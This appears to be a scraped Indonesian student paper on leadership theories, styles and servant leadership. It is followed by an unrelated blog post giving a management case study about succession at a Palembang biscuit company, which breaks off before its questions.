Dari latar belakang masalah yang penulis uraikan, banyak permasalahan yang penulis dapatkan. Permasalahan tersebut antara lain :

v Bagaimana hakikat menjadi seorang pemimpin?

v Adakah teori – teori untuk menjadi pemimpin yang baik?

v Apa & bagaimana menjadi pemimpin yang melayani?

v Apa & bagaimana menjadi pemimpin sejati?

v Bagaimana hubungan kearifan lokal dengan kepemimpinan?

I.3 TUJUAN PENULISAN

Adapun tujuan penulisan karya tulis ini adalah

· Melatih mahasiswa menyusun sebuah tulisan dalam upaya lebih meningkatkan pengetahuan dan kreatifitas mahasiswa.

· Agar mahasiswa lebih memahami dan mendalami pokok bahasan khususnya tentang kepemimpinan.

I.4 METODE PENULISAN

Dari banyak metode yang penyusun ketahui, penyusun menggunakan metode kepustakaan. Pada zaman modern ini metode kepustakaan tidak hanya berarti pergi ke perpustakaan tapi dapat pula dilakukan dengan mencari data-data di internet. Penyusun menggunakan metode ini karena jauh lebih praktis, efektif, efisien, serta sangat mudah untuk mencari bahan dan data – data tentang topik ataupun materi yang penyusun gunakan untuk karya tulis ini.

I.5 RUANG LINGKUP

Mengingat keterbatasan waktu dan kemampuan yang penyusun miliki maka ruang lingkup karya tulis ini terbatas pada pembahasan mengenai kepemimpinan.

.BAB II

PEMBAHASAN

II.1 HAKIKAT KEPEMIMPINAN

Dalam kehidupan sehari – hari, baik di lingkungan keluarga, organisasi, perusahaan sampai dengan pemerintahan sering kita dengar sebutan pemimpin, kepemimpinan serta kekuasaan. Ketiga kata tersebut memang memiliki hubungan yang berkaitan satu dengan lainnya.

Beberapa ahli berpandapat tentang Pemimpin, beberapa diantaranya :

· Menurut Drs. H. Malayu S.P. Hasibuan, Pemimpin adalah seseorang dengan wewenang kepemimpinannya mengarahkan bawahannya untuk mengerjakan sebagian dari pekerjaannya dalam mencapai tujuan.

· Menurut Robert Tanembaum, Pemimpin adalah mereka yang menggunakan wewenang formal untuk mengorganisasikan, mengarahkan, mengontrol para bawahan yang bertanggung jawab, supaya semua bagian pekerjaan dikoordinasi demi mencapai tujuan perusahaan.

· Menurut Prof. Maccoby, Pemimpin pertama-tama harus seorang yang mampu menumbuhkan dan mengembangkan segala yang terbaik dalam diri para bawahannya. Pemimpin yang baik untuk masa kini adalah orang yang religius, dalam artian menerima kepercayaan etnis dan moral dari berbagai agama secara kumulatif, kendatipun ia sendiri mungkin menolak ketentuan gaib dan ide ketuhanan yang berlainan.

· Menurut Lao Tzu, Pemimpin yang baik adalah seorang yang membantu mengembangkan orang lain, sehingga akhirnya mereka tidak lagi memerlukan pemimpinnya itu.

· Menurut Davis and Filley, Pemimpin adalah seseorang yang menduduki suatu posisi manajemen atau seseorang yang melakukan suatu pekerjaan memimpin.

· Sedangakn menurut Pancasila, Pemimpin harus bersikap sebagai pengasuh yang mendorong, menuntun, dan membimbing asuhannya. Dengan kata lain, beberapa asas utama dari kepemimpinan Pancasila adalah :

v Ing Ngarsa Sung Tuladha : Pemimpin harus mampu dengan sifat dan perbuatannya menjadikan dirinya pola anutan dan ikutan bagi orang – orang yang dipimpinnya.

v Ing Madya Mangun Karsa : Pemimpin harus mampu membangkitkan semangat berswakarsa dan berkreasi pada orang – orang yang dibimbingnya.

v Tut Wuri Handayani : Pemimpin harus mampu mendorong orang – orang yang diasuhnya berani berjalan di depan dan sanggup bertanggung jawab.

Seorang pemimpin boleh berprestasi tinggi untuk dirinya sendiri, tetapi itu tidak memadai apabila ia tidak berhasil menumbuhkan dan mengembangkan segala yang terbaik dalam diri para bawahannya. Dari begitu banyak definisi mengenai pemimpin, dapat penulis simpulkan bahwa : Pemimpin adalah orang yang mendapat amanah serta memiliki sifat, sikap, dan gaya yang baik untuk mengurus atau mengatur orang lain.

Kepemimpinan adalah kemampuan seseorang mempengaruhi dan memotivasi orang lain untuk melakukan sesuatu sesuai tujuan bersama. Kepemimpinan meliputi proses mempengaruhi dalam menentukan tujuan organisasi, memotivasi perilaku pengikut untuk mencapai tujuan, mempengaruhi untuk memperbaiki kelompok dan budayanya. Sedangkan kekuasaan adalah kemampuan untuk mempengaruhi orang lain untuk mau melakukan pap yang diinginkan pihak lainnya. Ketiga kata yaitu pemimpin, kepemimpinan serta kekuasaan yang dijelaskan sebelumnya tersebut memiliki keterikatan yang tak dapat dipisahkan. Karena untuk menjadi pemimpin bukan hanya berdasarkan suka satu sama lainnya, tetapi banyak faktor. Pemimpin yang berhasil hendaknya memiliki beberapa kriteria yang tergantung pada sudut pandang atau pendekatan yang digunakan, apakah itu kepribadiannya, keterampilan, bakat, sifat – sifatnya, atau kewenangannya yang dimiliki yang mana nantinya sangat berpengaruh terhadap teori maupun gaya kepemimpinan yang akan diterapkan.

Fungsi pemimpin dalam suatu organisasi tidak dapat dibantah merupakan sesuatu fungsi yang sangat penting bagi keberadaan dan kemajuan organisasi yang bersangkutan. Pada dasarnya fungsi kepemimpinan memiliki 2 aspek yaitu :

- Fungsi administrasi, yakni mengadakan formulasi kebijaksanakan administrasi dan menyediakan fasilitasnya.

- Fungsi sebagai Top Manajemen, yakni mengadakan planning, organizing, staffing, directing, commanding, controling, dsb.

II.2 TEORI KEPEMIMPINAN

Memahami teori-teori kepemimpinan sangat besar artinya untuk mengkaji sejauh mana kepemimpinan dalam suatu organisasi telah dapat dilaksanakan secara efektif serta menunjang kepada produktifitas organisasi secara keseluruhan. Dalam karya tulis ini akan dibahas tentang teori dan gaya kepemimpinan. Seorang pemimpin harus mengerti tentang teori kepemimpinan agar nantinya mempunyai referensi dalam menjalankan sebuah organisasi. Beberapa teori tentang kepemimpinan antara lain :

Ø Teori Kepemimpinan Sifat ( Trait Theory )

Analisis ilmiah tentang kepemimpinan berangkat dari pemusatan perhatian pemimpin itu sendiri. Teori sifat berkembang pertama kali di Yunani Kuno dan Romawi yang beranggapan bahwa pemimpin itu dilahirkan, bukan diciptakan yang kemudian teori ini dikenal dengan ”The Greatma Theory”. Dalam perkembanganya, teori ini mendapat pengaruh dari aliran perilaku pemikir psikologi yang berpandangan bahwa sifat – sifat kepemimpinan tidak seluruhnya dilahirkan akan tetapi juga dapat dicapai melalui pendidikan dan pengalaman. Sifat – sifat itu antara lain : sifat fisik, mental, dan kepribadian.

Keith Devis merumuskan 4 sifat umum yang berpengaruh terhadap keberhasilan kepemimpinan organisasi, antara lain :

o Kecerdasan

Berdasarkan hasil penelitian, pemimpin yang mempunyai kecerdasan yang tinggi di atas kecerdasan rata – rata dari pengikutnya akan mempunyai kesempatan berhasil yang lebih tinggi pula. Karena pemimpin pada umumnya memiliki tingkat kecerdasan yang lebih tinggi dibandingkan dengan pengikutnya.

o Kedewasaan dan Keluasan Hubungan Sosial

Umumnya di dalam melakukan interaksi sosial dengan lingkungan internal maupun eksternal, seorang pemimpin yang berhasil mempunyai emosi yang matang dan stabil. Hal ini membuat pemimpin tidak mudah panik dan goyah dalam mempertahankan pendirian yang diyakini kebenarannya.

o Motivasi Diri dan Dorongan Berprestasi

Seorang pemimpin yang berhasil umumnya memiliki motivasi diri yang tinggi serta dorongan untuk berprestasi. Dorongan yang kuat ini kemudian tercermin pada kinerja yang optimal, efektif dan efisien.

o Sikap Hubungan Kemanusiaan

Adanya pengakuan terhadap harga diri dan kehormatan sehingga para pengikutnya mampu berpihak kepadanya

Ø Teori Kepemimpinan Perilaku dan Situasi

Berdasarkan penelitian, perilaku seorang pemimpin yang mendasarkan teori ini memiliki kecendrungan kearah 2 hal, yaitu:

o Pertama yang disebut dengan Konsiderasi yaitu kecendrungan seorang pemimpin yang menggambarkan hubungan akrab dengan bawahan. Contoh gejala yang ada dalam hal ini seperti: membela bawahan, memberi masukan kepada bawahan dan bersedia berkonsultasi dengan bawahan.

o Kedua disebut Struktur Inisiasi yaitu Kecendrungan seorang pemimpin yang memberikan batasan kepada bawahan. Contoh yang dapat dilihat , bawahan mendapat instruksi dalam pelaksanaan tugas, kapan, bagaimana pekerjaan dilakukan, dan hasil yang akan dicapai.

Jadi, berdasarkan teori ini, seorang pemimpin yang baik adalah bagaimana seorang pemimpin yang memiliki perhatian yang tinggi kepada bawahan dan terhadap hasil yang tinggi pula.

Ø Teori Kewibawaan Pemimpin

Kewibawaan merupakan faktor penting dalam kehidupan kepemimpinan, sebab dengan faktor itu seorang pemimpin akan dapat mempengaruhi perilaku orang lain baik secara perorangan maupun kelompok sehingga orang tersebut bersedia untuk melakukan apa yang dikehendaki oleh pemimpin.

Ø Teori Kepemimpinan Situasi

Seorang pemimpin harus merupakan seorang pendiagnosa yang baik dan harus bersifat fleksibel, sesuai dengan perkembangan dan tingkat kedewasaan bawahan.

Ø Teori Kelompok

Agar tujuan kelompok (organisasi) dapat tercapai, harus ada pertukaran yang positif antara pemimpin dengan pengikutnya.

Dari adanya berbagai teori kepemimpinan di atas, dapat diketahui bahwa teori kepemimpinan tertentu akan sangat mempengaruhi gaya kepemimpinan (Leadership Style), yakni pemimpin yang menjalankan fungsi kepemimpinannya dengan segenap filsafat, keterampilan dan sikapnya. Gaya kepemimpinan adalah cara seorang pemimpan bersikap, berkomunikasi, dan berinteraksi dengan orang lain dalam mempengaruhi orang untuk melakukan sesuatu.Gaya tersebut bisa berbeda – beda atas dasar motivasi , kuasa ataupun orientasi terhadap tugas atau orang tertentu. Diantara beberapa gaya kepemimpinan, terdapat pemimpin yang positif dan negatif, dimana perbedaan itu didasarkan pada cara dan upaya mereka memotivasi karyawan. Apabila pendekatan dalam pemberian motivasi ditekankan pada imbalan atau reward (baik ekonomis maupun nonekonomis) berartitelah digunakan gaya kepemimpinan yang positif. Sebaliknya jika pendekatannya menekankan pada hukuman atau punishment, berarti dia menerapkan gaya kepemimpinan negatif. Pendekatan kedua ini dapat menghasilakan prestasi yang diterima dalam banyak situasi, tetapi menimbulkan kerugian manusiawi.

Selain gaya kepemimpinan di atas masih terdapat gaya lainnya.

ü Otokratis

Kepemimpinan seperti ini menggunakan metode pendekatan kekuasaan dalam mencapai keputusan dan pengembangan strukturnya. Kekuasaan sangat dominan digunakan. Memusatkan kekuasaan dan pengambilan keputusan bagi dirinya sendiri, dan menata situasi kerja yang rumit bagi pegawai sehingga mau melakukan apa saja yang diperintahkan. Kepemimpinan ini pada umumnya negatif, yang berdasarkan atas ancaman dan hukuman. Meskipun demikian, ada juga beberapa manfaatnya antaranya memungkinkan pengambilan keputusan dengan cepat serta memungkinkan pendayagunaan pegawai yang kurang kompeten.

ü Partisipasif

Lebih banyak mendesentrelisasikan wewenang yang dimilikinya sehingga keputusan yang diambil tidak bersifat sepihak.

ü Demokrasi

Ditandai adanya suatu struktur yang pengembangannya menggunakan pendekatan pengambilan keputusan yang kooperatif. Di bawah kepemimpinan pemimpin yang demokrasis cenderung bermoral tinggi dapat bekerjasama, mengutamakan mutu kerja dan dapat mengarahkan diri sendiri.

ü Kendali Bebas

Pemimpin memberikan kekuasaan penuh terhadap bawahan, struktur organisasi bersifat longgar dan pemimpin bersifat pasif. Yaitu Pemimpin menghindari kuasa dan tanggung – jawab, kemudian menggantungkannya kepada kelompok baik dalam menetapkan tujuan dan menanggulangi masalahnya sendiri.

Dilihat dari orientasi si pemimpin, terdapat dua gaya kepemimpinan yang diterapkan, yaitu gaya konsideral dan struktur, atau dikenal juga sebagai orientasi pegawai dan orientasi tugas. Beberapa hasil penelitian para ahli menunjukkan bahwa prestasi dan kepuasan kerja pegawai dapat ditingkatkan apabila konsiderasi merupakan gaya kepemimpinan yang dominan. Sebaliknya, para pemimpin yang berorientasi tugas yang terstruktur, percaya bahwa mereka memperoleh hasil dengan tetap membuat orang – orang sibuk dan mendesak mereka untuk berproduksi.

Pemimpin yang positif, partisipatif dan berorientasi konsiderasi,tidak selamanya merupakan pemimpinyan terbaik.fiedler telah mengembakan suatumodel pengecualian dari ketiga gaya kepemimpinan diatas,yakni model kepemimpinankontigennis.model ini nyatakan bahwa gaya kepemimpinan yang paling sesuai bergantung pada situasi dimana pemimpin bekerja.dengan teorinya ini fiedler ingin menunjukkan bahwa keefektifan ditunjukkan oleh interaksi antara orientasi pegawai dengan 3 variabel yang berkaitan dengan pengikut, tugas dan organisasi. Ketiga variabel itu adalah hubungan antara pemimpin dengan anngota ( Leader – member rolations), struktur tugas (task strukture), dan kuasa posisi pemimpin (Leader position power). Variabel pertama ditentukan oleh pengakuan atau penerimaan (akseptabilitas) pemimpin oleh pengikut, variabel kedua mencerminkan kadar diperlukannya cara spesifik untuk melakukan pekerjaan, variabel ketiga menggambarkan kuasa organisasi yang melekat pada posisi pemimpin.

Model kontingensi Fieldler ini serupa dengan gaya kepemimpinan situasional dari Hersey dan Blanchard. Konsepsi kepemimpinan situasional ini melengkapi pemimpin dengan pemahaman dari hubungan antara gaya kepemimpinan yang efektif dengan tingkat kematangan (muturity) pengikutnya.perilaku pengikut atau bawahan ini amat penting untuk mengetahui kepemimpinan situasional, karena bukan saja pengikut sebagai individu bisa menerima atau menolak pemimpinnya, akan tetapi sebagai kelompok , pengikut dapat menemukan kekuatan pribadi apapun yang dimiliki pemimpin.

Menurut Hersey dan Blanchard (dalam Ludlow dan Panton,1996 : 18 dst), masing – masing gaya kepemimpinan ini hanya memadai dalm situasi yang tepat meskipun disadari bahwa setiap orang memiliki gaya yang disukainya sendiri dan sering merasa sulit untuk mengubahnya meskipun perlu.

Banyak studi yang sudah dilakukan untuk melihat gaya kepemimpinan seseorang. Salah satunya yang terkenal adalah yang dikemukakan oleh Blanchard, yang mengemukakan 4 gaya dari sebuah kepemimpinan. Gaya kepemimpinan ini dipengaruhi oleh bagaimana cara seorang pemimpin memberikan perintah, dan sisi lain adalah cara mereka membantu bawahannya. Keempat gaya tersebut adalah

~ Directing

Gaya tepat apabila kita dihadapkan dengan tugas yang rumit dan staf kita belum memiliki pengalaman dan motivasi untuk mengerjakan tugas tersebut. Atau apabila anda berada di bawah tekanan waktu penyelesaian. Kita menjelaskan apa yang perlu dan apa yang harus dikerjakan. Dalam situasi demikian, biasanya terjadi over-communicating (penjelasan berlebihan yang dapat menimbulkan kebingungan dan pembuangan waktu). Dalam proses pengambilan keputusan, pemimpin memberikan aturan –aturan dan proses yang detil kepada bawahan. Pelaksanaan di lapangan harus menyesuaikan dengan detil yang sudah dikerjakan.

~ Coaching

Pemimpin tidak hanya memberikan detil proses dan aturan kepada bawahan tapi juga menjelaskan mengapa sebuah keputusan itu diambil, mendukung proses perkembangannya, dan juga menerima barbagai masukan dari bawahan. Gaya yang tepat apabila staf kita telah lebih termotivasi dan berpengalaman dalam menghadapi suatu tugas. Disini kita perlu memberikan kesempatan kepada mereka untuk mengerti tentang tugasnya, dengan meluangkan waktu membangun hubungan dan komunikasi yang baik dengan mereka.

~ Supporting

Sebuah gaya dimana pemimpin memfasiliasi dan membantu upaya bawahannya dalam melakukan tugas. Dalam hal ini, pemimpin tidak memberikan arahan secara detail, tetapi tanggung jawab dan proses pengambilan keputusan dibagi bersama dengan bawahan. Gaya ini akan berhasil apabila karyawan telah mengenal teknik – teknik yang dituntut dan telah mengembangkan hubungan yang lebih dekat dengan anda. Dalam hal ini kita perlumeluangkan waktu untuk berbincang – bincang, untuk lebih melibatkan mereka dalam penganbilan keputusan kerja, serta mendengarkan saran – saran mereka mengenai peningkatan kinerja.

~ Delegating

Sebuah gaya dimana seorang pemimpin mendelegasikan seluruh wewenang dan tanggung jawabnya kepada bawahan. Gaya Delegating akan berjalan baik apabila staf kita sepenuhnya telah paham dan efisien dalm pekerjaan, sehingga kita dapat melepas mereka menjalankan tugas atau pekerjaan itu atas kemampuan dan inisiatifnya sendiri.

Keempat gaya ini tentu saja mempunyai kelemahan dan kelebihan, serta sangat tergantung dari lingkungan di mana seorang pemimpin berada, dan juga kesiapan dari bawahannya. Maka kemudian timbul apa yang disebut sebagai ”situational leadership”. Situational leadership mengindikasikan bagaimana seorang pemimpin harus menyesuaikan keadaan dari orang – orang yang dipimpinnya.

Ditengah – tengah dinamika organisasi (yang antara lain diindikasikan oleh adanya perilaku staf / individu yang berbeda – beda), maka untuk mencapai efektivitas organisasi, penerapan keempat gaya kepemimpinan diatas perlu disesuaikan dengan tuntutan keadaan. Inilah yang dimaksud dengan situasional lesdership,sebagaimana telah disinggung di atas. Yang perlu diperhatikan adalah bahwa untuk dapat mengembangkan gaya kepemimpinan situasional ini, seseorang perlu memiliki tiga kemampuan khusus yakni :

Q Kemampuan analitis (analytical skills) yakni kemampuan untuk menilai tingkat pengalaman dan motivasi bawahan dalam melaksanakan tugas.

Q Kemampuan untuk fleksibel (flexibility atau adaptability skills) yaitu kemampuan untuk menerapkan gaya kepemimpinan yang paling tepat berdasarkan analisa terhadap situasi.

Q Kemampuan berkomunikasi (communication skills) yakni kemampuan untuk menjelaskan kepada bawahan tentang perubahan gaya kepemimpinan yang kita terapkan.

Ketiga kemampuan di atas sangat dibutuhkan bagi seorang pemimpin, sebab seorang pemimpin harus dapat melaksanakan tiga peran utamanya yakni peran interpersonal, peran pengolah informasi (information processing), serta peran pengambilan keputusan (decision making) (Gordon, 1996 : 314-315).

Peran pertama meliputi :

ü Peran Figurehead ® Sebagai simbol dari organisasi

ü Leader® Berinteraksi dengan bawahan, memotivasi dan mengembangkannya

ü Liaison ® Menjalin suatu hubungan kerja dan menangkap informasi untuk kepentingan organisasi.

Sedangkan peran kedua terdiri dari 3 peran juga yakni :

ü Monitior ® Memimpin rapat dengan bawahan, mengawasi publikasi perusahaan, atau berpartisipasi dalam suatu kepanitiaan.

ü Disseminator ® Menyampaikan informasi, nilai – nilai baru dan fakta kepada bawahan.

ü Spokeman ® Juru bicara atau memberikan informasi kepada orang – orang di luar organisasinya.

Peran ketiga terdiri dari 4 peran yaitu :

ü Enterpreneur ® Mendesain perubahan dan pengembangan dalam organisasi.

ü Disturbance Handler ® Mampu mengatasi masalah terutama ketika organisasi sedang dalam keadaan menurun.

ü Resources Allocator ® Mengawasi alokasi sumber daya manusia, materi, uang dan waktu dengan melakukan penjadwalan, memprogram tugas – tugas bawahan, dan mengesahkan setiap keputusan.

ü Negotiator ® Melakukan perundingan dan tawar – menawar.

Dalam perspektif yang lebih sederhana, Morgan ( 1996 : 156 ) mengemukakan 3 macam peran pemimpin yang disebut dengan 3A, yakni :

ü Alighting ® Menyalakan semangat pekerja dengan tujuan individunya.

ü Aligning ® Menggabungkan tujuan individu dengan tujuan organisasi sehingga setiap orang menuju ke arah yang sama.

ü Allowing ® Memberikan keleluasaan kepada pekerja untuk menantang dan mengubah cara kerja mereka.

Jika saja Indonesia memiliki pemimpin yang sangat tangguh tentu akan menjadi luar biasa. Karena jatuh bangun kita tergantung pada pemimpin. Pemimpin memimpin, pengikut mengikuti. Jika pemimpin sudah tidak bisa memimpin dengan baik, cirinya adalah pengikut tidak mau lagi mengikuti. Oleh karena itu kualitas kita tergantung kualitas pemimpin kita. Makin kuat yang memimpin maka makin kuat pula yang dipimpin.

II.3 KEPEMIMPINAN YANG MELAYANI

Merenungkan kembali arti makna kepemimpinan, sering diartikan kepemimpinan adalah jabatan formal, yang menuntut untuk mendapat fasilitas dan pelayanan dari konstituen yang seharusnya dilayani. Meskipun banyak di antara pemimpin yang ketika dilantik mengatakan bahwa jabatan adalah sebuah amanah, namun dalam kenyataannya sedikit sekali atau bisa dikatakan hampir tidak ada pemimpin yang sungguh – sungguh menerapkan kepemimpinan dari hati, yaitu kepemimpinan yang melayani.

A. Karakter Kepemimpinan

Kepemimpianan yang melayani dimulai dari dalam diri kita. Kepemimpinan menuntut suatu transformasi dari dalam hati dan perubahan karakter. Kepemimpinan yang melayani dimulai dari dalam dan kemudian bergerak keluar untuk melayani mereka yang dipimpinnya. Disinilah pentingnya karakter dan integritas seorang pemimpin untuk menjadi pemimpin yang diterima oleh rakyat yang dipimpinnya. Kembali kita saksikan betapa banyak pemimpin yang mengaku wakil rakyat ataupun pejabat publik, justru tidak memiliki integritas sama sekali, karena apa yang diucapkan dan dijanjikan ketika kampanye dalam pemilu tidak sama dengan yang dilakukan ketika sudah duduk nyaman di kursinya.

Seorang pemimpin memiliki kerinduan untuk membangun dan mengembangkan mereka yang dipimpinnya sehingga tumbuh banyak pemimpin dalam kelomponya. Hal ini sejalan dengan buku yang ditulis oleh John Maxwell berjudul Developing the Leaders Around You. Keberhasilan seorang pemimpin sangat tergantung dari kemampuannya untuk membangun orang – orang di sekitarnya, karena keberhasilan sebuah organisasi sangat tergantung pada potensi sumber daya manusia dalam organisasi tersebut. Jika sebuah organisasi atau masyarakat mempunyai banyak anggota dengan kualitas pemimpin, organisasi atau bangsa tersebut akan berkembang dan menjadi kuat.

Seorang pemimpin yang memiliki hati yang melayani adalah akuntabilitas (accountable). Istilah akuntabilitas adalah berarti penuh tanggung jawab dan dapat diandalkan. Artinya seluruh perkataan,pikiran dan tindakannya dapat dipertanggungjawabkan kepada public atau kepada setiap anggota organisasinya.

B. Metode Kepemimpinan

Seorang pemimpin tidak cukup hanya memiliki hati atau karakter semata, tapi juga harus memiliki serangkaian metode kepemimpinan agar dapat menjadi pemimpin yang efektif. Banyak sekali pemimpin memiliki kualitas sari aspek yang pertama yaitu karakter dan integritas seorang pemimpin, tetapi ketika menjadi pimpinan formal, justru tidak efektif sama sekali karena tidak memiliki metode kepemimpinan yang baik. Contoh adalah para pemimpin yang diperlukan untuk mengelola mereka yang dipimpinnya.

Tidak banyak pemimpin yang memiliki metode kepemimpinan ini. Karena hal ini tidak pernah diajarkan di sekolah – sekolah formal. Keterampilan seperti ini disebut dengan Softskill atau Personalskill. Ada 3 hal penting dalam metode kepemimpinan, yaitu :

v Kepemimpinan yang efektif dimulai dengan visi yang jelas. Visi ini merupakan sebuah daya atau kekuatan untuk melakukan perubahan, yang mendorong terjadinya proses ledakan kreatifitas yang dahsyat melalui integrasi maupun sinergi berbagai keahlian dari orang – orang yang ada dalam organisasi tersebut.

v Seorang pemimpin yang efektif adalah seorang yang responsive. Artinya dia selalu tanggap terhadap setiap persoalan, kebutuhan, harapan, dan impian dari mereka yang dipimpin. Selain itu selalu aktif dan proaktif dalam mencari solusi dari setiap permasalahan ataupun tantangan yang dihadapi.

v Seorang pemimpin yang efektif adalah seorang pelatih atau pendamping bagi orang – orang yang dipimpinnya (performance coach). Artinya dia memiliki kemempuan untuk menginspirasi, mendorong dan memampukan anak buahnya dalam menyusun perencanaan (termasuk rencana kegiatan, target atau sasaran, rencana kebutuhan sumber daya, dsb), melakukan kegiatan sehari – hari seperti monitoring dan pengendalian, serta mengevaluasi kinerja dari bawahannya.

II.4 KEPEMIMPINAN SEJATI

Kepemimpinan adalah sebuah keputusan dan lebih merupakan hasil dari proses perubahan karakter atau tranformasi internal dalam diri seseorang. Kepemimpinan bukanlah jabatan atau gelar, melainkan sebuah kelahiran dari proses panjang perubahan dalam diri seseorang. Ketika seseorang menemukan visi dan misi hidupnya, ketika terjadi kedamaian dalam diri (inner peace) dan membentuk bangunan karakter yang kokoh, ketika setiap ucapan dan tindakannya mulai memberikan pengaruh kepada lingkungannya, dan ketika keberadaannya mendorong perubahan dalam organisasinya, pada saat itulah seseorang lahir menjadi pemimpin sejati. Jadi pemimpin bukan sekedar gelar atau jabatan yang diberikan dari luar melainkan sesuatu yang tumbuh dan berkembang dari dalam diri seseorang. Kepemimpinan lahir dari proses internal.

Kepemimpinan sesungguhnya tidak ditentukan oleh pangkat atau jabatan seseorang. Kepemimpinan adalah sesuatu yang muncul dari dalam dan merupakan buah dari keputusan seseorang untuk mau menjadi pemimpin, baik bagi dirinya sendiri, bagi keluarga, bagi lingkungan pekerjaan, maupun bagi lingkungan sosial dan bahkan bagi negerinya. Sering kali seorang pemimpin sejati tidak diketahui keberadaannya oleh mereka yang dipimpinnya. Bahkan ketika misi atau tugas terselesaikan, maka seluruh anggota tim akan mengatakan bahwa merekalah yang melakukannya sendiri.

Konsep pemikiran seperti ini adalah sesuatu yang baru dan mungkin tidak bisa diterima oleh para pemimpin konvensional yang justru mengharapkan penghormatan dan pujian dari mereka yang dipimpinnya. Semakin dipuji bahkan dikultuskan, semakin tinggi hati dan lupa dirilah seorang pemimpin. Justru kepemimpinan sejati adalah kepemimpinan yang didasarkan pada kerendahan hati.

Sebuah jenis kepemimpinan yaitu Q Leader memiliki 4 makna terkait dengan kepemimpinan sejati, yaitu :

Ø Q berarti kecerdasan atau intelligence. Seperti dalam IQ berarti kecerdasan intelektual,EQ berarti kecerdasan emosional, dan SQ berarti kecerdasan spiritual. Q leader berarti seorang pemimpin yang memiliki kecerdasan IQ,EQ,SQ yang cukup tinggi.

Ø Q leader berarti kepemimpinan yang memiliki kualitas(quality), baik dari aspek visioner maupun aspek manajerial.

Ø Q leader berarti seorang pemimpin yang memiliki qi ( dibaca ‘chi’ dalam bahasa Mandarin yang berarti kehidupan).

Ø Q keempat adalah qolbu atau inner self. Seorang pemimpin sejati adalah seseorang yang sungguh – sungguh mengenali dirinya (qolbunya) dan dapat mengelola dan mengendalikannya (self management atau qolbu management).

Menjadi seorang pemimpin Q berarti menjadi seorang pemimpin yang selalu belajar dan bertumbuh senantiasa untuk mencapai tingkat atau kadar Q (intelligence-quality-qi-qolbu) yang lebih tinggi dalam upaya pencapaian misi dan tujuan organisasi maupun pencapaian makna kehidupan setiap pribadi seorang pemimpin.

Rangkuman kepemimpinan Q dalam 3 aspek penting yang disingkat menajadi 3C, yaitu :

· Perubahan karakter dari dalam diri (character chage).

· Visi yang jelas (clear vision).

· Kemampuan atau kompetensi yang tinggi (competence).

Ketiga hal tersebut dilandasi oleh suatu sikap disiplin yang tinggi untuk senantiasa bertumbuh, belajar dan berkembang baik secara internal (pengembangan kemampuan intrapersonal, kemampuan teknis, pengatahuan,dll) maupun dalam hubungannya dengan orang lain (pengembangan kemampuan interpersonal dan metode kepemimpinan).

BAB III

PENUTUP

III.1 KESIMPULAN

Kata pemimpin, kepemimpinan serta kekuasaan memiliki keterikatan yang tak dapat dipisahkan. Karena untuk menjadi pemimpin bukan hanya berdasarkan suka satu sama lainnya, tetapi banyak faktor. Pemimpin yang berhasil hendaknya memiliki beberapa kriteria yang tergantung pada sudut pandang atau pendekatan yang digunakan, apakah itu kepribadiannya, keterampilan, bakat, sifat – sifatnya, atau kewenangannya yang dimiliki yang mana nantinya sangat berpengaruh terhadap teori maupun gaya kepemimpinan yang akan diterapkan.

Rahasia utama kepemimpinan adalah kekuatan terbesar seorang pemimpin bukan dari kekuasaanya, bukan kecerdasannya, tapi dari kekuatan pribadinya. Seorang pemimpin sejati selalu bekerja keras memperbaiki dirinya sebelum sibuk memperbaiki orang lain.

Pemimpin bukan sekedar gelar atau jabatan yang diberikan dari luar melainkan sesuatu yang tumbuh dan berkembang dari dalam diri seseorang. Kepemimpinan lahir dari proses internal (leadership from the inside out).

III.2 SARAN

Sangat diperlukan sekali jiwa kepemimpinan pada setiap pribadi manusia. Jiwa kepemimpinan itu perlu selalu dipupuk dan dikembangkan. Paling tidak untuk memimpin diri sendiri.

DAFTAR PUSTAKA

Website:

http://kiternando.blogspot.com/2010/01/kepemimpinan.html

http://dina-nhakha.blogspot.com/2011/01/manajemen-umum-kepemimpinan.html

http://chacha259271.wordpress.com/2011/01/15/manajemen-umum/

Tugas Manajemen Umum I

06.17 by UnknownNo comments

Buat teman-teman sistem informasi di STMIK AKBA ini nich soal kasus manajemen umum.

Kasus

PT Mahar Merdeka adalah sebuah perusahaan Biskuit yang sangat berkembang. Perusahaan ini berlokasi di kota Palembang dan didirikan oleh Bapak Martono Kusuma (68 tahun). Perusahaan berdiri semenjak tahun 1975 atau telah berusia sekitar 36 tahun dan memiliki karyawan keseluruhan sebanyak 370 orang, mulai dari bagian pabrik, administrasi, hingga pemasaran

Bapak Martono Kusuma memiliki anak laki-laki bernama Agus Kusumo (27 tahun) yang kuliah di Yale University, Amerika Serikat. Agus kusumo adalah anak yang cerdas dan saat ini dalam proses akhir kuliah di bidang Manajemen Bisnis untuk Strata 2 atau setingkat Magister

Dua bulan yang lalu ia pulang ke Palembang dan bapak martono kusumo berkeinginan Agus untuk melanjutkan dan mengembangkan bisnis yang telah dibangunnya tersebut menjadi semakin berkembang. Kebetulan bapak Martono Kusumo hanya memiliki satu orang anak saja yaitu Agus. Apalagi kondisi pak Martono Kusumo yang saat ini sudah tidak ingin lagi diributkan oleh kondisi pekerjaan karena ingin konsentrasi pada ibadah.

Atas dasar itu Agus Kusumo menyanggupi namun ia meminta 2 (dua) bulan lagi untuk merampungkan kuliahnya di Amerika. Dalam diskusi yang pernah terbangun antara pak Martono Kusumo dan para manajer serta Agus Kusumo, terlihat jelas jika Agus ingin mengubah sistem manajemen yang telah diterapkan selama ini dengan alasan itu bersifat atau masih menggunakan sistem manajemen tradisional ke arah sistem manajemen modern. Perubahan tersebut diperkirakan mencapai 90% kondisi yang berlaku saat ini, yaitu mulai dari sistem pembukuan, tatanan kedisiplinan, relationship antar pegawai, target penjualan, ketegasan dalam membangun hubungan dengan mitra bisnis, bahkan sampai dengan sangsi kepada para pegawai dan mitra bisnis yang membandel/tidak patuh pada perjanjian

Keinginan Agus tersebut menimbulkan banyak reaksi serius dari para manajer perusahaan. Menurut mereka selama ini perusahaan sudah berjalan dengan baik dan penjualan juga sudah meningkat serta hubungan para karyawan baik semuanya, walaupun ada beberapa karyawan serta mitra bisnis yang dianggap tidak patuh tetapi semua itu mampu diselesaikan dengan teknik pendekatan pak Martono Kusumo

Namun agus menginginkan semua itu seperti yang ia pelajari di Yale University, Amerika Serikat tersebut. Karena dia menganggap jika itu tidak ia terapkan semua yang ia pelajari akan sia-sia saja, dan ia memiliki bukti tentang keberhasilan perusahaan yang menerapkan konsep manajemen modern

Pertanyaan

